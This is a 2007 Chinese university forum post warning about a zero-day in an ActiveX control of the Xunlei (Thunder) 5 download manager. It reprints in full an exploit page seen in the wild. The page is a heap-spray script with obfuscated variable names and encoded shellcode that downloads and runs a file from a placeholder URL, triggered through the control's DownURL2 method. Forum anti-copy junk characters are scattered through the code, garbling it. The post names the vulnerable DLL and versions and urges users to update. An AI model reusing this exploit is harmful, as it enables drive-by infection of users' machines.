诚毅小家|集美大学生活【集美大学,诚毅学院,水产学院,师范学院,美术学院,财经学院,体育学院,航海学院,集美学村,石鼓路,龙舟池】

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
查看: 424|回复: 0

最新迅雷5出现0-Day漏洞?新版的迅雷5.7.2.371 应该无此漏洞,请大家更新

[复制链接]
发表于 2007-9-26 22:12:35 | 显示全部楼层 |阅读模式
根据恶意网址检测的线报,发现一恶意网址使用未公开的迅雷50-Day漏洞进行挂马,其EXP代码如下:
; P0 z0 s" ?+ O# j6 ]1 R. k
6 p* U* b3 u9 a  b2 c<html>. M% S+ ?: ^; n+ ^
<head>: A, F. ^7 U1 i- {+ x
<meta http-equiv="Content-Type" c >
6 U2 S* @& P2 e6 S. y<title></title>' s5 U% z: A6 @3 n2 B
</head><body>5 a1 a4 @; J3 l, Y7 Q( Q
<html>
  q! S' |" s7 n* O7 h<object classid="clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266" id='target'></object>$ b1 x7 M4 a1 i3 j7 T# K3 a
<script language="javascript">* k- v1 H' z( g" B
var she132132132132llc13ode = unescape("%u9090"+"%u9090"+ 7 V8 c1 T8 U2 [: R
"%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +& k2 c. N6 L3 s4 c! V. b
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +3 Q" f4 b  v9 I
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +$ _( `7 U& j+ Z! _: ~8 j
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
/ i# X6 T7 o6 z) {+ t"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
. J# w2 _4 g' P"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +" o4 ]. e5 b- E  g7 ~* Z( l' a. t
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
! Q  i+ W$ n2 e% j6 [! ?"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +  ( Y, a7 |. n% {  N; l- `3 z, m
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
0 J2 q) z  j3 K* T2 \"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
6 f& X! D) {2 a! B* U$ U4 S; N! I"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +$ x# j) a9 ~" |/ `
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
3 x: }8 I5 b! \/ X"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
" j! u: |  j: M: y" ?# l"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +% S- h2 i8 ^- }; U6 b
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +$ {' e. l  m, S
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
( w* _6 h( f( ^1 Q"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +7 q$ y0 C4 V6 c/ }
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
9 b1 I) a* b. f$ s4 @0 g"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +8 j2 z+ k6 l. w( g
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
# @8 A% s& t9 R0 R: Y  |"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +2 v) {% ?/ ^8 d6 a/ R( F
"%u6946%u656c%u0041%u7468%u7074此处为需要下载病毒的网址%u0000");9 {! ^0 r) q; }4 d7 _
</script>9 I  m$ R* t9 T: c- ~
<script language="javascript">
* q& r7 b  _4 o& ~( X" u! y1 Pvar IsNop1236326312 = '';
! N2 P$ i, y! q& y( J; a- v- yvar bi3123g123665blo2131ck = unescape("%u9090%u9090");
! h" z; K' F! L* Gvar IsNop1236326312 = '';
! n  a3 R: S. I1 C, u/ F# F6 xvar he132132aders123132ize = 20;9 ]6 ?3 _' D* H5 b  M" J! T% X& d
var IsNop1236326312 = '';, O- w8 z" `3 l: L( O8 n
var sl21123112ack312231312space = he132132aders123132ize+she132132132132llc13ode.length;
# t8 F0 J' n6 Fvar IsNop1236326312 = '';
1 d/ t& k( P; N, b6 g# a8 _while (bi3123g123665blo2131ck.length<sl21123112ack312231312space) bi3123g123665blo2131ck+=bi3123g123665blo2131ck;
+ i# S7 G' Z: |( T/ _fillblock = bi3123g123665blo2131ck.substring(0, sl21123112ack312231312space);
, {: o2 C' F% s/ G! ^& Pblock = bi3123g123665blo2131ck.substring(0, bi3123g123665blo2131ck.length-sl21123112ack312231312space);
' s  P4 s* k3 n9 S( ywhile(block.length+sl21123112ack312231312space<0x40000) block = block+block+fillblock;( ?1 t  j& b: D( A
memory = new Array();
: E3 X  k# Z8 ?1 P3 ~( Ofor (x=0; x<300; x++) memory[x] = block + she132132132132llc13ode;" O2 S, a% e1 y2 N3 i& F
var b1u1231ff312er = '';# k9 d6 I8 S2 R3 f& L/ x! V  E
var IsNop1236326312 = '';
2 {8 z  R2 X- q, N" svar IsNop1236326312 = '';3 v" i. i5 O4 E$ ]
while (b1u1231ff312er.length < 4057) b1u1231ff312er+="\x0a\x0a\x0a\x0a";& s# e6 Y- |9 e- V4 h7 [# o7 f
b1u1231ff312er+="\x0a";  
. n& k& W+ B! o6 a/ Ab1u1231ff312er+="\x0a";( \7 g. o/ H& `) {& p' \
b1u1231ff312er+="\x0a";7 n) Q1 g( R& Q- f4 g% Y5 O4 S" k
b1u1231ff312er+="\x0a\x0a\x0a\x0a";* I* ~& W. y8 n- }$ Q- m9 P9 e) g  L8 q
b1u1231ff312er+="\x0a\x0a\x0a\x0a";
- l8 ]0 _: c3 i! M& cvar yes="1111";1 U) J- b( X' |0 X; v! Q) e. ?
target.DownURL2(b1u1231ff312er,yes,yes,yes);
# q4 S8 N, R0 c, qvar IsNop1236326312 = '';" Q, Z  h# r9 R. Z- @
</script>
3 [# n: t  b+ q' `) ~5 |2 r9 W</body></html>该代码风格颇相前段时间的《暴风影音IIActiveX栈溢出漏洞》,尾部为%u7468%u7074+此处为需要下载病毒的网址+%u0000"),但其CLSID为:EEDD6FF9-13DE-496B-9A1C-D78B3215E266 1 v# l/ R# W6 z' }+ Z! s0 x

2 L. ^7 S; s5 D- n$ F
! H7 l! F+ z3 Z* e" I5 n2 u0 l
$ i" a8 Q0 h. E( k" ~5 e经验证,该ActiveX控件文件为:C:\Program Files\Thunder Network\Thunder\Components\DownAndPlay\DownAndPlay\DapPlayer1.0.0.41.dll
, A- b  b+ ]8 s$ S  W; q# `# i9 }
我已经将该信息提交给迅雷官方,相信迅雷官方会尽快更新软件, 字串5
! N; a' F  `% k3 [% j9 a; F* P4 e
在此,网络巡警提醒大家,使用迅雷软件请尽量使用最新版本的,最新版本下载地址为: ( r2 k2 l4 m& s2 U; h+ q1 e) m

* H5 x7 n. b9 Q0 @9 Dhttp://pstatic.xunlei.com/about/product/down_xl5.htm
9 q/ ^3 o- p% Y4 A& U3 f. @
9 m5 r9 J% \4 Q, c) E( Z: s8 x0 E/ ]我会进一步关注此漏洞。
/ x% J* {) A& c4 H: }8 P& }: P8 m) R: o9 m, q; D
最近情况: 9 o) U' K# @% N" \+ q

8 p+ S) F8 B' \从一些信息来看,含有此漏洞的迅雷版本号为Xunlei Web Thunder 5.6.9.344
5 Q3 o2 e; w/ ]. v5 _4 A1 x新版的迅雷5.7.2.371 应该无此漏洞,请大家更新~ ( n: n. e9 M% _# \2 n+ j8 C
, y9 y7 r; Q" E9 I
另外,该漏洞是一个叫做 7jdg 的人挖掘发现的(高手啊)。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|诚毅小家 ( 小家社区工作室 闽ICP备05007965号 )

GMT+8, 2024-11-22 01:47 , Processed in 0.102568 second(s), 21 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表